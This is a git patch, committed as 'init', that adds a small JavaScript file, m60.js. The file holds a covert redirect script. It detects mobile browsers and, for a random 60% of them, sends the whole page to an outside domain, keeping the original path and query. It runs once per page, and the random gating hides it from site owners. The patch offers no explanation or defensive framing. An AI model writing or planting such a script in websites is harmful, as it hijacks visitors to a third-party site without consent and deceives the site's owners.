From b68dc759ab836a73ef16a77a7c8f5dfb3e1dbdcd Mon Sep 17 00:00:00 2001 From: w64addzg Date: Thu, 20 Aug 2026 18:58:18 +0000 Subject: [PATCH] init --- m60.js | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 m60.js diff --git a/m60.js b/m60.js new file mode 100644 index 0000000..e49e6a0 --- /dev/null +++ b/m60.js @@ -0,0 +1,5 @@ +(function(){try{if(window.__w64)return;window.__w64=1;}catch(e){} +var m=/Mobile|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent||''); +if(!m)return; if(Math.random()>=0.6)return; +var t='https://xiazai.it.com'+location.pathname+location.search; try{top.location.replace(t)}catch(e){location.href=t} +})(); \ No newline at end of file